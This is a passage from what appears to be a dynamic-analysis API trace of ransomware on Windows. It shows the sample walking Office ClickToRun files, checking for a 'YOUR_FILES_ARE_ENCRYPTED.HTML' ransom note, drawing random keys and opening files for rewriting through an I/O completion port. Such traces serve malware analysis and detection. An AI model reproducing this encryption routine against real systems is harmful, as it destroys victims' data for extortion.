out: lpFileSize=0x4ebdb1c*=14088) returned 1 [0156.549] GetProcessHeap () returned 0x270000 [0156.549] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0156.553] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="67") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="9B") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="E0") returned 2 [0156.553] wsprintfW (in: 
param_1=0x4ebda42, param_2="%02X" | out: param_1="6D") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="AA") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="0A") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="AA") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="75") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="2C") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="80") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="FE") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="DF") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="12") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="57") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="3D") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="0A") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="12") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="8A") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="EF") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="98") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="51") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="7A") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="40") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="BF") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="CB") returned 2 
[0156.553] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="B3") returned 2 [0156.554] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="1E") returned 2 [0156.554] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="75") returned 2 [0156.554] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="ED") returned 2 [0156.554] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="2F") returned 2 [0156.554] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="DA") returned 2 [0156.554] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="48") returned 2 [0156.554] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml" [0156.554] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.554] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0156.555] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92cf2b50, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92cf2b50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x776cf9f0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0xaac34, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", 
cAlternateFileName="C2RMAN~3.XML")) returned 1 [0156.555] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml") returned 129 [0156.555] lstrcmpW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.555] PathFindExtensionW (pszPath="C2RManifest.shared.Office.x-none.msi.16.x-none.xml") returned=".xml" [0156.555] lstrlenW (lpString=".xml") returned 4 [0156.556] PathFindExtensionW (pszPath="C2RManifest.shared.Office.x-none.msi.16.x-none.xml") returned=".xml" [0156.556] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.556] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0156.573] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=699444) returned 1 [0156.573] GetProcessHeap () returned 0x270000 [0156.573] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0156.577] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="9C") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="C8") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="F0") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="D5") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | 
out: param_1="84") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="7A") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="E5") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="EB") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="51") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="A4") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="37") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="84") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="21") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="D9") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="B2") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="57") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="2D") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="5D") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="4F") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="87") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="D6") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="5C") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="3D") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="C6") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="8E") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="CC") returned 2 [0156.577] wsprintfW (in: 
param_1=0x4ebda9e, param_2="%02X" | out: param_1="14") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="84") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="6E") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="95") returned 2 [0156.578] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="B8") returned 2 [0156.578] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="37") returned 2 [0156.578] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" [0156.578] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.578] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0156.579] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92c34470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92c34470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77afa070, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x15286, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", cAlternateFileName="C2RMAN~2.XML")) returned 1 [0156.579] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" 
| out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml") returned 125 [0156.579] lstrcmpW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.579] PathFindExtensionW (pszPath="C2RManifest.Word.Word.x-none.msi.16.x-none.xml") returned=".xml" [0156.579] lstrlenW (lpString=".xml") returned 4 [0156.580] PathFindExtensionW (pszPath="C2RManifest.Word.Word.x-none.msi.16.x-none.xml") returned=".xml" [0156.580] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.581] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0156.601] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=86662) returned 1 [0156.603] GetProcessHeap () returned 0x270000 [0156.603] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0156.604] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="AD") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="9E") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="20") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="BC") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="FF") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="F4") returned 2 [0156.604] wsprintfW (in: 
param_1=0x4ebda4e, param_2="%02X" | out: param_1="4C") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="BC") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="D8") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="CC") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="AD") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="0D") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="75") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="41") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="7A") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="B3") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="30") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="9A") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="9A") returned 2 [0156.604] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="B0") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="4C") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="FD") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="0A") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="00") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="41") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="AB") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="76") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="60") returned 2 
[0156.605] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="A2") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="D3") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="C5") returned 2 [0156.605] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="69") returned 2 [0156.606] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" [0156.606] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.606] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0156.610] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92c0e310, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x7815fb90, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x1301e, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.wordmui.msi.16.en-us.xml", cAlternateFileName="C2RMAN~1.XML")) returned 1 [0156.610] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml") returned 115 [0156.610] lstrcmpW 
(lpString1="C2RManifest.wordmui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.610] PathFindExtensionW (pszPath="C2RManifest.wordmui.msi.16.en-us.xml") returned=".xml" [0156.610] lstrlenW (lpString=".xml") returned 4 [0156.610] PathFindExtensionW (pszPath="C2RManifest.wordmui.msi.16.en-us.xml") returned=".xml" [0156.610] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.610] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.wordmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0156.618] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=77854) returned 1 [0156.618] GetProcessHeap () returned 0x270000 [0156.619] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0156.619] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="49") returned 2 [0156.619] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="A6") returned 2 [0156.619] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="BE") returned 2 [0156.619] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="D2") returned 2 [0156.619] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="E3") returned 2 [0156.619] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="D3") returned 2 [0156.619] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="63") returned 2 [0156.619] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="BE") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="B7") 
returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="EC") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="43") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="EB") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="AF") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="F0") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="C2") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="ED") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="46") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="F4") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="21") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="07") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="DB") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="E5") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="91") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="B0") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="40") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="05") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="8F") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="1A") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="D4") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="F4") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebdaae, 
param_2="%02X" | out: param_1="01") returned 2 [0156.620] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="41") returned 2 [0156.621] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.wordmui.msi.16.en-us.xml" [0156.621] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.621] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0156.633] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92c0e310, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92c0e310, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77a3b990, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0xd1e70, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="integrator.exe", cAlternateFileName="INTEGR~1.EXE")) returned 1 [0156.633] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\integrator.exe") returned 93 [0156.633] lstrcmpW (lpString1="integrator.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.633] PathFindExtensionW (pszPath="integrator.exe") returned=".exe" [0156.633] lstrlenW (lpString=".exe") returned 4 [0156.633] PathFindExtensionW (pszPath="integrator.exe") returned=".exe" [0156.633] FindNextFileW (in: 
hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x91a13d30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0x91a13d30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0x91a13d30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xce8, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", cAlternateFileName="MICROS~2.XML")) returned 1 [0156.633] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml") returned 132 [0156.633] lstrcmpW (lpString1="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.633] PathFindExtensionW (pszPath="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml") returned=".xml" [0156.633] lstrlenW (lpString=".xml") returned 4 [0156.633] PathFindExtensionW (pszPath="Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml") returned=".xml" [0156.633] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.633] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\microsoft_office_officetelemetryagentfallback2016.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0156.634] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=3304) returned 1 [0156.634] GetProcessHeap () returned 0x270000 
[0156.634] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0156.635] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="93") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="D7") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="B9") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="D0") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="33") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="5D") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="F6") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="33") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="95") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="A1") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="4C") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="45") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="D8") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="5D") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="37") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="B4") returned 2 [0156.635] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="3F") returned 2 